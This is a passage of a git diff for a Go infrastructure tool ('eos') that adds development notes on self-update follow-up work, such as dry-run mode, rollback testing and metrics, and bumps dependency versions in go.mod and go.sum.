+**Next step**: Introduce `--force-insecure` flag at the command layer, thread through `RuntimeContext.Attributes`, require matching audit record before setting `VAULT_SKIP_VERIFY=1`.
+
+### 9. PullRepository coverage gap
+
+**Problem**: `PullRepository` is the main orchestrator function but only has integration tests that exercise it end-to-end. Individual decision branches (fetch-first skip, stash-not-needed, credential-fail-fast) lack isolated unit tests.
+
+**Root cause**: Function is tightly coupled to real git operations, making unit testing harder.
+
+**Next step**: Extract the decision logic into a pure function (`pullDecision(state) -> action`) that can be unit tested with table-driven tests, keeping the effectful code thin.
diff --git a/docs/development/self-update-follow-up-issues-2026-03-12.md b/docs/development/self-update-follow-up-issues-2026-03-12.md
new file mode 100644
index 000000000..13acf6bc1
--- /dev/null
+++ b/docs/development/self-update-follow-up-issues-2026-03-12.md
@@ -0,0 +1,28 @@
+# Self-Update Follow-Up Issues
+
+Date: 2026-03-12
+Scope: `eos self update`
+
+1. Issue: Persist self-update transaction records outside ephemeral logs
+Description: Write a compact JSON transaction record to disk so operators can inspect the last successful, skipped, failed, and rolled-back update without parsing journal output.
+Why follow up: The current refactor improves structured logs, but there is still no durable per-run transaction artifact for incident review.
+
+2. Issue: Add explicit dry-run mode for `eos self update`
+Description: Provide `eos self update --dry-run` to report trusted remote status, credential readiness, source/binary commit drift, disk space, and planned actions without mutating git or the installed binary.
+Why follow up: This would further improve operator trust and reduce risky trial runs on production hosts.
+
+3. Issue: Support authenticated non-interactive pulls with documented credential sources
+Description: Add first-class support for non-interactive token or SSH-agent based update flows and document the precedence order for repo-local, root, and invoking-user git credential configuration.
+Why follow up: The current behavior is safer and clearer, but HTTPS auth under `sudo` remains operationally fragile.
+
+4. Issue: Add an end-to-end rollback smoke test with a synthetic install failure
+Description: Exercise `pull -> build -> backup -> failed install -> rollback` in one controlled scenario and assert binary restoration plus git/stash restoration semantics.
+Why follow up: Current coverage is strong around units and focused lanes, but rollback orchestration still depends mostly on lower-level tests.
+
+5. Issue: Expose self-update counters and outcomes as process metrics
+Description: Export metrics for `started`, `skipped`, `succeeded`, `failed`, and `rolled_back` self-update outcomes, plus phase durations.
+Why follow up: CI emits artifacts and alerts, but runtime observability is still log-centric rather than metric-driven.
+
+6. Issue: Document the installed-binary-versus-source-commit model
+Description: Add operator-facing docs describing when `eos self update` skips, rebuilds, or backs up the binary and how embedded build metadata affects those decisions.
+Why follow up: The new no-op path is simpler, but the rationale should be explicit for maintainers and operators.
diff --git a/go.mod b/go.mod
index 8252d9e95..0bebc4ea6 100644
--- a/go.mod
+++ b/go.mod
@@ -1,17 +1,15 @@
module github.com/CodeMonkeyCybersecurity/eos
-go 1.24.6
-
-toolchain go1.24.7
+go 1.25.7
require (
- code.gitea.io/sdk/gitea v0.22.1
- cuelang.org/go v0.14.2
- filippo.io/mlkem768 v0.0.0-20250818110517-29047ffe79fb
+ code.gitea.io/sdk/gitea v0.23.2
+ cuelang.org/go v0.15.4
+ filippo.io/mlkem768 v0.0.0-20260214141301-2e7bebc7d88d
github.com/DATA-DOG/go-sqlmock v1.5.2
github.com/bradleyjkemp/cupaloy/v2 v2.8.0
- github.com/ceph/go-ceph v0.36.0
- github.com/charmbracelet/bubbles v0.21.0
+ github.com/ceph/go-ceph v0.38.0
+ github.com/charmbracelet/bubbles v0.21.1
github.com/charmbracelet/bubbletea v1.3.10
github.com/charmbracelet/lipgloss v1.1.0
github.com/cockroachdb/errors v1.12.0
@@ -20,52 +18,53 @@ require (
github.com/emersion/go-sasl v0.0.0-20241020182733-b788ff22d5a6
github.com/emersion/go-smtp v0.24.0
github.com/fsnotify/fsnotify v1.9.0
- github.com/go-git/go-git/v5 v5.16.3
+ github.com/go-git/go-git/v5 v5.17.0
github.com/go-ldap/ldap/v3 v3.4.12
- github.com/go-playground/validator/v10 v10.28.0
+ github.com/go-playground/validator/v10 v10.30.1
github.com/go-resty/resty/v2 v2.16.5
github.com/godbus/dbus/v5 v5.1.1-0.20230522191255-76236955d466
github.com/google/uuid v1.6.0
github.com/gorilla/mux v1.8.1
- github.com/hashicorp/consul/api v1.20.0
+ github.com/hashicorp/consul/api v1.33.4
github.com/hashicorp/go-multierror v1.1.1
- github.com/hashicorp/go-version v1.7.0
+ github.com/hashicorp/go-version v1.8.0
github.com/hashicorp/hcl/v2 v2.24.0
- github.com/hashicorp/nomad/api v0.0.0-20251105172100-f20a01eda06e
+ github.com/hashicorp/nomad/api v0.0.0-20260226211936-d304b7de5d67
github.com/hashicorp/terraform-exec v0.24.0
github.com/hashicorp/vault/api v1.22.0
github.com/hashicorp/vault/api/auth/approle v0.11.0
github.com/hashicorp/vault/api/auth/userpass v0.11.0
github.com/hetznercloud/hcloud-go/v2 v2.29.0
github.com/joho/godotenv v1.5.1
- github.com/lib/pq v1.10.9
- github.com/olekukonko/tablewriter v1.1.0
- github.com/open-policy-agent/opa v1.10.1
- github.com/redis/go-redis/v9 v9.16.0
+ github.com/lib/pq v1.11.2
+ github.com/olekukonko/tablewriter v1.1.3
+ github.com/open-policy-agent/opa v1.14.0
+ github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2
+ github.com/redis/go-redis/v9 v9.18.0
github.com/sashabaranov/go-openai v1.41.2
- github.com/shirou/gopsutil/v4 v4.25.10
+ github.com/shirou/gopsutil/v4 v4.26.2
github.com/sony/gobreaker v1.0.0
- github.com/spf13/cobra v1.10.1
+ github.com/spf13/cobra v1.10.2
github.com/spf13/pflag v1.0.10
github.com/spf13/viper v1.21.0
github.com/stretchr/testify v1.11.1
github.com/uptrace/opentelemetry-go-extra/otelzap v0.3.2
- github.com/zclconf/go-cty v1.17.0
- go.opentelemetry.io/otel v1.38.0
- go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.38.0
- go.opentelemetry.io/otel/metric v1.38.0
- go.opentelemetry.io/otel/sdk v1.38.0
- go.opentelemetry.io/otel/trace v1.38.0
- go.uber.org/zap v1.27.0
- golang.org/x/crypto v0.43.0
- golang.org/x/sys v0.37.0
- golang.org/x/term v0.36.0
- golang.org/x/text v0.30.0
+ github.com/zclconf/go-cty v1.18.0
+ go.opentelemetry.io/otel v1.40.0
+ go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.40.0
+ go.opentelemetry.io/otel/metric v1.40.0
+ go.opentelemetry.io/otel/sdk v1.40.0
+ go.opentelemetry.io/otel/trace v1.40.0
+ go.uber.org/zap v1.27.1
+ golang.org/x/crypto v0.48.0
+ golang.org/x/sys v0.41.0
+ golang.org/x/term v0.40.0
+ golang.org/x/text v0.34.0
golang.org/x/time v0.14.0
gopkg.in/yaml.v3 v3.0.1
gorm.io/driver/postgres v1.6.0
gorm.io/gorm v1.31.1
- libvirt.org/go/libvirt v1.11006.0
+ libvirt.org/go/libvirt v1.11010.0
mvdan.cc/sh/v3 v3.12.0
)
@@ -101,14 +100,14 @@ require (
github.com/beorn7/perks v1.0.1 // indirect
github.com/cenkalti/backoff/v4 v4.3.0 // indirect
github.com/cespare/xxhash/v2 v2.3.0 // indirect
- github.com/charmbracelet/colorprofile v0.3.3 // indirect
- github.com/charmbracelet/x/ansi v0.10.3 // indirect
- github.com/charmbracelet/x/cellbuf v0.0.13 // indirect
+ github.com/charmbracelet/colorprofile v0.4.1 // indirect
+ github.com/charmbracelet/x/ansi v0.11.5 // indirect
+ github.com/charmbracelet/x/cellbuf v0.0.15 // indirect
github.com/charmbracelet/x/exp/golden v0.0.0-20251023181713-f594ac034d6b // indirect
github.com/charmbracelet/x/term v0.2.2 // indirect
- github.com/clipperhouse/displaywidth v0.4.1 // indirect
+ github.com/clipperhouse/displaywidth v0.9.0 // indirect
github.com/clipperhouse/stringish v0.1.1 // indirect
- github.com/clipperhouse/uax29/v2 v2.3.0 // indirect
+ github.com/clipperhouse/uax29/v2 v2.5.0 // indirect
github.com/cloudflare/circl v1.6.1 // indirect
github.com/cockroachdb/apd/v3 v3.2.1 // indirect
github.com/cockroachdb/logtags v0.0.0-20241215232642-bb51bb14a506 // indirect
@@ -122,26 +121,25 @@ require (
github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f // indirect
github.com/distribution/reference v0.6.0 // indirect
github.com/docker/go-units v0.5.0 // indirect
- github.com/ebitengine/purego v0.9.1 // indirect
+ github.com/ebitengine/purego v0.10.0 // indirect
github.com/emicklei/proto v1.14.2 // indirect
github.com/emirpasic/gods v1.18.1 // indirect
github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f // indirect
github.com/fatih/color v1.18.0 // indirect
github.com/felixge/httpsnoop v1.0.4 // indirect
- github.com/gabriel-vasile/mimetype v1.4.11 // indirect
+ github.com/gabriel-vasile/mimetype v1.4.12 // indirect
github.com/getsentry/sentry-go v0.36.2 // indirect
github.com/go-asn1-ber/asn1-ber v1.5.8-0.20250403174932-29230038a667 // indirect
github.com/go-fed/httpsig v1.1.0 // indirect
github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376 // indirect
- github.com/go-git/go-billy/v5 v5.6.2 // indirect
- github.com/go-ini/ini v1.67.0 // indirect
+ github.com/go-git/go-billy/v5 v5.8.0 // indirect
github.com/go-jose/go-jose/v4 v4.1.3 // indirect
github.com/go-logr/logr v1.4.3 // indirect
github.com/go-logr/stdr v1.2.2 // indirect
github.com/go-ole/go-ole v1.3.0 // indirect
github.com/go-playground/locales v0.14.1 // indirect
github.com/go-playground/universal-translator v0.18.1 // indirect
- github.com/go-viper/mapstructure/v2 v2.4.0 // indirect
+ github.com/go-viper/mapstructure/v2 v2.5.0 // indirect
github.com/gobwas/glob v0.2.3 // indirect
github.com/goccy/go-json v0.10.5 // indirect
github.com/gogo/protobuf v1.3.2 // indirect
@@ -180,9 +178,8 @@ require (
github.com/lestrrat-go/dsig v1.0.0 // indirect
github.com/lestrrat-go/dsig-secp256k1 v1.0.0 // indirect
github.com/lestrrat-go/httpcc v1.0.1 // indirect
- github.com/lestrrat-go/httprc/v3 v3.0.1 // indirect
- github.com/lestrrat-go/jwx/v3 v3.0.12 // indirect
- github.com/lestrrat-go/option v1.0.1 // indirect
+ github.com/lestrrat-go/httprc/v3 v3.0.2 // indirect
+ github.com/lestrrat-go/jwx/v3 v3.0.13 // indirect
github.com/lestrrat-go/option/v2 v2.0.0 // indirect
github.com/lucasb-eyer/go-colorful v1.3.0 // indirect
github.com/lufia/plan9stats v0.0.0-20251013123823-9fd1530e3ec3 // indirect
@@ -203,13 +200,12 @@ require (
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 // indirect
github.com/olekukonko/cat v0.0.0-20250911104152-50322a0618f6 // indirect
github.com/olekukonko/errors v1.1.0 // indirect
- github.com/olekukonko/ll v0.1.2 // indirect
+ github.com/olekukonko/ll v0.1.4-0.20260115111900-9e59c2286df0 // indirect
github.com/opencontainers/go-digest v1.0.0 // indirect
github.com/opencontainers/image-spec v1.1.1 // indirect
github.com/pelletier/go-toml/v2 v2.2.4 // indirect
github.com/pjbgf/sha1cd v0.5.0 // indirect
github.com/pkg/errors v0.9.1 // indirect
- github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 // indirect
github.com/power-devops/perfstat v0.0.0-20240221224432-82ca36839d55 // indirect
github.com/prometheus/client_golang v1.23.2 // indirect
github.com/prometheus/client_model v0.6.2 // indirect
@@ -224,17 +220,17 @@ require (
github.com/sahilm/fuzzy v0.1.1 // indirect
github.com/segmentio/asm v1.2.1 // indirect
github.com/sergi/go-diff v1.4.0 // indirect
- github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af // indirect
+ github.com/sirupsen/logrus v1.9.4 // indirect
github.com/skeema/knownhosts v1.3.2 // indirect
github.com/spf13/afero v1.15.0 // indirect
github.com/spf13/cast v1.10.0 // indirect
github.com/stretchr/objx v0.5.3 // indirect
github.com/subosito/gotenv v1.6.0 // indirect
github.com/tchap/go-patricia/v2 v2.3.3 // indirect
- github.com/tklauser/go-sysconf v0.3.15 // indirect
- github.com/tklauser/numcpus v0.10.0 // indirect
+ github.com/tklauser/go-sysconf v0.3.16 // indirect
+ github.com/tklauser/numcpus v0.11.0 // indirect
github.com/uptrace/opentelemetry-go-extra/otelutil v0.3.2 // indirect
- github.com/valyala/fastjson v1.6.4 // indirect
+ github.com/valyala/fastjson v1.6.7 // indirect
github.com/vektah/gqlparser/v2 v2.5.31 // indirect
github.com/xanzy/ssh-agent v0.3.3 // indirect
github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb // indirect
@@ -243,20 +239,21 @@ require (
github.com/yashtewari/glob-intersection v0.2.0 // indirect
github.com/yusufpapurcu/wmi v1.2.4 // indirect
go.opentelemetry.io/auto/sdk v1.2.1 // indirect
- go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.63.0 // indirect
+ go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.65.0 // indirect
go.opentelemetry.io/otel/log v0.14.0 // indirect
+ go.uber.org/atomic v1.11.0 // indirect
go.uber.org/multierr v1.11.0 // indirect
go.yaml.in/yaml/v2 v2.4.3 // indirect
go.yaml.in/yaml/v3 v3.0.4 // indirect
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 // indirect
- golang.org/x/mod v0.29.0 // indirect
- golang.org/x/net v0.46.0 // indirect
+ golang.org/x/mod v0.32.0 // indirect
+ golang.org/x/net v0.50.0 // indirect
golang.org/x/oauth2 v0.32.0 // indirect
- golang.org/x/sync v0.17.0 // indirect
- golang.org/x/tools v0.38.0 // indirect
- google.golang.org/genproto/googleapis/api v0.0.0-20251022142026-3a174f9686a8 // indirect
- google.golang.org/genproto/googleapis/rpc v0.0.0-20251022142026-3a174f9686a8 // indirect
- google.golang.org/protobuf v1.36.10 // indirect
+ golang.org/x/sync v0.19.0 // indirect
+ golang.org/x/tools v0.41.0 // indirect
+ google.golang.org/genproto/googleapis/api v0.0.0-20260128011058-8636f8732409 // indirect
+ google.golang.org/genproto/googleapis/rpc v0.0.0-20260128011058-8636f8732409 // indirect
+ google.golang.org/protobuf v1.36.11 // indirect
gopkg.in/warnings.v0 v0.1.2 // indirect
gotest.tools/v3 v3.5.2 // indirect
sigs.k8s.io/yaml v1.6.0 // indirect
diff --git a/go.sum b/go.sum
index 5fd26b5e7..88b3e5996 100644
--- a/go.sum
+++ b/go.sum
@@ -1,14 +1,14 @@
cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
-code.gitea.io/sdk/gitea v0.22.1 h1:7K05KjRORyTcTYULQ/AwvlVS6pawLcWyXZcTr7gHFyA=
-code.gitea.io/sdk/gitea v0.22.1/go.mod h1:yyF5+GhljqvA30sRDreoyHILruNiy4ASufugzYg0VHM=
+code.gitea.io/sdk/gitea v0.23.2 h1:iJB1FDmLegwfwjX8gotBDHdPSbk/ZR8V9VmEJaVsJYg=
+code.gitea.io/sdk/gitea v0.23.2/go.mod h1:yyF5+GhljqvA30sRDreoyHILruNiy4ASufugzYg0VHM=
cuelabs.dev/go/oci/ociregistry v0.0.0-20250722084951-074d06050084 h1:4k1yAtPvZJZQTu8DRY8muBo0LHv6TqtrE0AO5n6IPYs=
cuelabs.dev/go/oci/ociregistry v0.0.0-20250722084951-074d06050084/go.mod h1:4WWeZNxUO1vRoZWAHIG0KZOd6dA25ypyWuwD3ti0Tdc=
-cuelang.org/go v0.14.2 h1:LDlMXbfp0/AHjNbmuDYSGBbHDekaXei/RhAOCihpSgg=
-cuelang.org/go v0.14.2/go.mod h1:53oOiowh5oAlniD+ynbHPaHxHFO5qc3QkzlUiB/9kps=
+cuelang.org/go v0.15.4 h1:lrkTDhqy8dveHgX1ZLQ6WmgbhD8+rXa0fD25hxEKYhw=
+cuelang.org/go v0.15.4/go.mod h1:NYw6n4akZcTjA7QQwJ1/gqWrrhsN4aZwhcAL0jv9rZE=
dario.cat/mergo v1.0.2 h1:85+piFYR1tMbRrLcDwR18y4UKJ3aH1Tbzi24VRW1TK8=
dario.cat/mergo v1.0.2/go.mod h1:E/hbnu0NxMFBjpMIE34DRGLWqDy0g5FuKDhCb31ngxA=
-filippo.io/mlkem768 v0.0.0-20250818110517-29047ffe79fb h1:9eVxcquiUiJn/f8DtnqmsN/8Asqw+h9b1+sM3T/Wl44=
-filippo.io/mlkem768 v0.0.0-20250818110517-29047ffe79fb/go.mod h1:ncYN/Z4GaQBV6TIbmQ7+lIaI+qGXCmZr88zrXHneVHs=
+filippo.io/mlkem768 v0.0.0-20260214141301-2e7bebc7d88d h1:YyLyABjdrdt2l/E6JAnku4BjhEDXhxQD2bPOnOvy8/M=
+filippo.io/mlkem768 v0.0.0-20260214141301-2e7bebc7d88d/go.mod h1:ym4egWKLpazdho3bHx0xuQlCq02ttP+vhxxKO8LgO9c=
github.com/42wim/httpsig v1.2.3 h1:xb0YyWhkYj57SPtfSttIobJUPJZB9as1nsfo7KWVcEs=
github.com/42wim/httpsig v1.2.3/go.mod h1:nZq9OlYKDrUBhptd77IHx4/sZZD+IxTBADvAPI9G/EM=
github.com/Azure/go-ansiterm v0.0.0-20250102033503-faa5f7b0171c h1:udKWzYgxTojEKWjV8V+WSxDXJ4NFATAsZjh8iIbsQIg=
@@ -62,41 +62,41 @@ github.com/bsm/ginkgo/v2 v2.12.0 h1:Ny8MWAHyOepLGlLKYmXG4IEkioBysk6GpaRTLC8zwWs=
github.com/bsm/ginkgo/v2 v2.12.0/go.mod h1:SwYbGRRDovPVboqFv0tPTcG1sN61LM1Z4ARdbAV9g4c=
github.com/bsm/gomega v1.27.10 h1:yeMWxP2pV2fG3FgAODIY8EiRE3dy0aeFYt4l7wh6yKA=
github.com/bsm/gomega v1.27.10/go.mod h1:JyEr/xRbxbtgWNi8tIEVPUYZ5Dzef52k01W3YH0H+O0=
-github.com/bytecodealliance/wasmtime-go/v37 v37.0.0 h1:DPjdn2V3JhXHMoZ2ymRqGK+y1bDyr9wgpyYCvhjMky8=
-github.com/bytecodealliance/wasmtime-go/v37 v37.0.0/go.mod h1:Pf1l2JCTUFMnOqDIwkjzx1qfVJ09xbaXETKgRVE4jZ0=
+github.com/bytecodealliance/wasmtime-go/v39 v39.0.1 h1:RibaT47yiyCRxMOj/l2cvL8cWiWBSqDXHyqsa9sGcCE=
+github.com/bytecodealliance/wasmtime-go/v39 v39.0.1/go.mod h1:miR4NYIEBXeDNamZIzpskhJ0z/p8al+lwMWylQ/ZJb4=
github.com/cenkalti/backoff/v4 v4.3.0 h1:MyRJ/UdXutAwSAT+s3wNd7MfTIcy71VQueUuFK343L8=
github.com/cenkalti/backoff/v4 v4.3.0/go.mod h1:Y3VNntkOUPxTVeUxJ/G5vcM//AlwfmyYozVcomhLiZE=
github.com/cenkalti/backoff/v5 v5.0.3 h1:ZN+IMa753KfX5hd8vVaMixjnqRZ3y8CuJKRKj1xcsSM=
github.com/cenkalti/backoff/v5 v5.0.3/go.mod h1:rkhZdG3JZukswDf7f0cwqPNk4K0sa+F97BxZthm/crw=
-github.com/ceph/go-ceph v0.36.0 h1:IDE4vEF+4fmjve+CPjD1WStgfQ+Lh6vD+9PMUI712KI=
-github.com/ceph/go-ceph v0.36.0/go.mod h1:fGCbndVDLuHW7q2954d6y+tgPFOBnRLqJRe2YXyngw4=
+github.com/ceph/go-ceph v0.38.0 h1:Ux0sIpl6VJNgY21hxuBZI9Z2Z8tQsBMJhjLjYBoa7s0=
+github.com/ceph/go-ceph v0.38.0/go.mod h1:GQVPe5YWoCMOrGnpDDieQoQZRLkB0tJmIokbqxbwPBQ=
github.com/cespare/xxhash/v2 v2.1.1/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs=
github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
-github.com/charmbracelet/bubbles v0.21.0 h1:9TdC97SdRVg/1aaXNVWfFH3nnLAwOXr8Fn6u6mfQdFs=
-github.com/charmbracelet/bubbles v0.21.0/go.mod h1:HF+v6QUR4HkEpz62dx7ym2xc71/KBHg+zKwJtMw+qtg=
+github.com/charmbracelet/bubbles v0.21.1 h1:nj0decPiixaZeL9diI4uzzQTkkz1kYY8+jgzCZXSmW0=
+github.com/charmbracelet/bubbles v0.21.1/go.mod h1:HHvIYRCpbkCJw2yo0vNX1O5loCwSr9/mWS8GYSg50Sk=
github.com/charmbracelet/bubbletea v1.3.10 h1:otUDHWMMzQSB0Pkc87rm691KZ3SWa4KUlvF9nRvCICw=
github.com/charmbracelet/bubbletea v1.3.10/go.mod h1:ORQfo0fk8U+po9VaNvnV95UPWA1BitP1E0N6xJPlHr4=
-github.com/charmbracelet/colorprofile v0.3.3 h1:DjJzJtLP6/NZ8p7Cgjno0CKGr7wwRJGxWUwh2IyhfAI=
-github.com/charmbracelet/colorprofile v0.3.3/go.mod h1:nB1FugsAbzq284eJcjfah2nhdSLppN2NqvfotkfRYP4=
+github.com/charmbracelet/colorprofile v0.4.1 h1:a1lO03qTrSIRaK8c3JRxJDZOvhvIeSco3ej+ngLk1kk=
+github.com/charmbracelet/colorprofile v0.4.1/go.mod h1:U1d9Dljmdf9DLegaJ0nGZNJvoXAhayhmidOdcBwAvKk=
github.com/charmbracelet/lipgloss v1.1.0 h1:vYXsiLHVkK7fp74RkV7b2kq9+zDLoEU4MZoFqR/noCY=
github.com/charmbracelet/lipgloss v1.1.0/go.mod h1:/6Q8FR2o+kj8rz4Dq0zQc3vYf7X+B0binUUBwA0aL30=
-github.com/charmbracelet/x/ansi v0.10.3 h1:3WoV9XN8uMEnFRZZ+vBPRy59TaIWa+gJodS4Vg5Fut0=
-github.com/charmbracelet/x/ansi v0.10.3/go.mod h1:uQt8bOrq/xgXjlGcFMc8U2WYbnxyjrKhnvTQluvfCaE=
-github.com/charmbracelet/x/cellbuf v0.0.13 h1:/KBBKHuVRbq1lYx5BzEHBAFBP8VcQzJejZ/IA3iR28k=
-github.com/charmbracelet/x/cellbuf v0.0.13/go.mod h1:xe0nKWGd3eJgtqZRaN9RjMtK7xUYchjzPr7q6kcvCCs=
+github.com/charmbracelet/x/ansi v0.11.5 h1:NBWeBpj/lJPE3Q5l+Lusa4+mH6v7487OP8K0r1IhRg4=
+github.com/charmbracelet/x/ansi v0.11.5/go.mod h1:2JNYLgQUsyqaiLovhU2Rv/pb8r6ydXKS3NIttu3VGZQ=
+github.com/charmbracelet/x/cellbuf v0.0.15 h1:ur3pZy0o6z/R7EylET877CBxaiE1Sp1GMxoFPAIztPI=
+github.com/charmbracelet/x/cellbuf v0.0.15/go.mod h1:J1YVbR7MUuEGIFPCaaZ96KDl5NoS0DAWkskup+mOY+Q=
github.com/charmbracelet/x/exp/golden v0.0.0-20251023181713-f594ac034d6b h1:RnUuOxaEkUGEmAfmpjII43eoIkE6wyOFtWxXrOCiE78=
github.com/charmbracelet/x/exp/golden v0.0.0-20251023181713-f594ac034d6b/go.mod h1:V8n/g3qVKNxr2FR37Y+otCsMySvZr601T0C7coEP0bw=
github.com/charmbracelet/x/term v0.2.2 h1:xVRT/S2ZcKdhhOuSP4t5cLi5o+JxklsoEObBSgfgZRk=
github.com/charmbracelet/x/term v0.2.2/go.mod h1:kF8CY5RddLWrsgVwpw4kAa6TESp6EB5y3uxGLeCqzAI=
github.com/circonus-labs/circonus-gometrics v2.3.1+incompatible/go.mod h1:nmEj6Dob7S7YxXgwXpfOuvO54S+tGdZdw9fuRZt25Ag=
github.com/circonus-labs/circonusllhist v0.1.3/go.mod h1:kMXHVDlOchFAehlya5ePtbp5jckzBHf4XRpQvBOLI+I=
-github.com/clipperhouse/displaywidth v0.4.1 h1:uVw9V8UDfnggg3K2U84VWY1YLQ/x2aKSCtkRyYozfoU=
-github.com/clipperhouse/displaywidth v0.4.1/go.mod h1:R+kHuzaYWFkTm7xoMmK1lFydbci4X2CicfbGstSGg0o=
+github.com/clipperhouse/displaywidth v0.9.0 h1:Qb4KOhYwRiN3viMv1v/3cTBlz3AcAZX3+y9OLhMtAtA=
+github.com/clipperhouse/displaywidth v0.9.0/go.mod h1:aCAAqTlh4GIVkhQnJpbL0T/WfcrJXHcj8C0yjYcjOZA=
github.com/clipperhouse/stringish v0.1.1 h1:+NSqMOr3GR6k1FdRhhnXrLfztGzuG+VuFDfatpWHKCs=
github.com/clipperhouse/stringish v0.1.1/go.mod h1:v/WhFtE1q0ovMta2+m+UbpZ+2/HEXNWYXQgCt4hdOzA=
-github.com/clipperhouse/uax29/v2 v2.3.0 h1:SNdx9DVUqMoBuBoW3iLOj4FQv3dN5mDtuqwuhIGpJy4=
-github.com/clipperhouse/uax29/v2 v2.3.0/go.mod h1:Wn1g7MK6OoeDT0vL+Q0SQLDz/KpfsVRgg6W7ihQeh4g=
+github.com/clipperhouse/uax29/v2 v2.5.0 h1:x7T0T4eTHDONxFJsL94uKNKPHrclyFI0lm7+w94cO8U=
+github.com/clipperhouse/uax29/v2 v2.5.0/go.mod h1:Wn1g7MK6OoeDT0vL+Q0SQLDz/KpfsVRgg6W7ihQeh4g=
github.com/cloudflare/circl v1.6.1 h1:zqIqSPIndyBh1bjLVVDHMPpVKqp8Su/V+6MeDzzQBQ0=
github.com/cloudflare/circl v1.6.1/go.mod h1:uddAzsPgqdMAYatqJ0lsjX1oECcQLIlRpzZh3pJrofs=
github.com/cockroachdb/apd/v3 v3.2.1 h1:U+8j7t0axsIgvQUqthuNm82HIrYXodOV2iWLWtEaIwg=
@@ -125,8 +125,8 @@ github.com/davidmz/go-pageant v1.0.2 h1:bPblRCh5jGU+Uptpz6LgMZGD5hJoOt7otgT454Wv
github.com/davidmz/go-pageant v1.0.2/go.mod h1:P2EDDnMqIwG5Rrp05dTRITj9z2zpGcD9efWSkTNKLIE=
github.com/decred/dcrd/dcrec/secp256k1/v4 v4.4.0 h1:NMZiJj8QnKe1LgsbDayM4UoHwbvwDRwnI3hwNaAHRnc=
github.com/decred/dcrd/dcrec/secp256k1/v4 v4.4.0/go.mod h1:ZXNYxsqcloTdSy/rNShjYzMhyjf0LaoftYK0p+A3h40=
-github.com/dgraph-io/badger/v4 v4.8.0 h1:JYph1ChBijCw8SLeybvPINizbDKWZ5n/GYbz2yhN/bs=
-github.com/dgraph-io/badger/v4 v4.8.0/go.mod h1:U6on6e8k/RTbUWxqKR0MvugJuVmkxSNc79ap4917h4w=
+github.com/dgraph-io/badger/v4 v4.9.1 h1:DocZXZkg5JJHJPtUErA0ibyHxOVUDVoXLSCV6t8NC8w=
+github.com/dgraph-io/badger/v4 v4.9.1/go.mod h1:5/MEx97uzdPUHR4KtkNt8asfI2T4JiEiQlV7kWUo8c0=
github.com/dgraph-io/ristretto/v2 v2.2.0 h1:bkY3XzJcXoMuELV8F+vS8kzNgicwQFAaGINAEJdWGOM=
github.com/dgraph-io/ristretto/v2 v2.2.0/go.mod h1:RZrm63UmcBAaYWC1DotLYBmTvgkrs0+XhBd7Npn7/zI=
github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f h1:lO4WD4F/rVNCu3HqELle0jiPLLBs70cWOduZpkS1E78=
@@ -143,8 +143,8 @@ github.com/docker/go-units v0.5.0 h1:69rxXcBk27SvSaaxTtLh/8llcHD8vYHT7WSdRZ/jvr4
github.com/docker/go-units v0.5.0/go.mod h1:fgPhTUdO+D/Jk86RDLlptpiXQzgHJF7gydDDbaIK4Dk=
github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY=
github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto=
-github.com/ebitengine/purego v0.9.1 h1:a/k2f2HQU3Pi399RPW1MOaZyhKJL9w/xFpKAg4q1s0A=
-github.com/ebitengine/purego v0.9.1/go.mod h1:iIjxzd6CiRiOG0UyXP+V1+jWqUXVjPKLAI0mRfJZTmQ=
+github.com/ebitengine/purego v0.10.0 h1:QIw4xfpWT6GWTzaW5XEKy3HXoqrJGx1ijYHzTF0/ISU=
+github.com/ebitengine/purego v0.10.0/go.mod h1:iIjxzd6CiRiOG0UyXP+V1+jWqUXVjPKLAI0mRfJZTmQ=
github.com/elazarl/goproxy v1.7.2 h1:Y2o6urb7Eule09PjlhQRGNsqRfPmYI3KKQLFpCAV3+o=
github.com/elazarl/goproxy v1.7.2/go.mod h1:82vkLNir0ALaW14Rc399OTTjyNREgmdL2cVoIbS6XaE=
github.com/emersion/go-sasl v0.0.0-20241020182733-b788ff22d5a6 h1:oP4q0fw+fOSWn3DfFi4EXdT+B+gTtzx8GC9xsc26Znk=
@@ -164,14 +164,14 @@ github.com/felixge/httpsnoop v1.0.4 h1:NFTV2Zj1bL4mc9sqWACXbQFVBBg2W3GPvqp8/ESS2
github.com/felixge/httpsnoop v1.0.4/go.mod h1:m8KPJKqk1gH5J9DgRY2ASl2lWCfGKXixSwevea8zH2U=
github.com/fortytw2/leaktest v1.3.0 h1:u8491cBMTQ8ft8aeV+adlcytMZylmA5nnwwkRZjI8vw=
github.com/fortytw2/leaktest v1.3.0/go.mod h1:jDsjWgpAGjm2CA7WthBh/CdZYEPF31XHquHwclZch5g=
-github.com/foxcpp/go-mockdns v1.1.0 h1:jI0rD8M0wuYAxL7r/ynTrCQQq0BVqfB99Vgk7DlmewI=
-github.com/foxcpp/go-mockdns v1.1.0/go.mod h1:IhLeSFGed3mJIAXPH2aiRQB+kqz7oqu8ld2qVbOu7Wk=
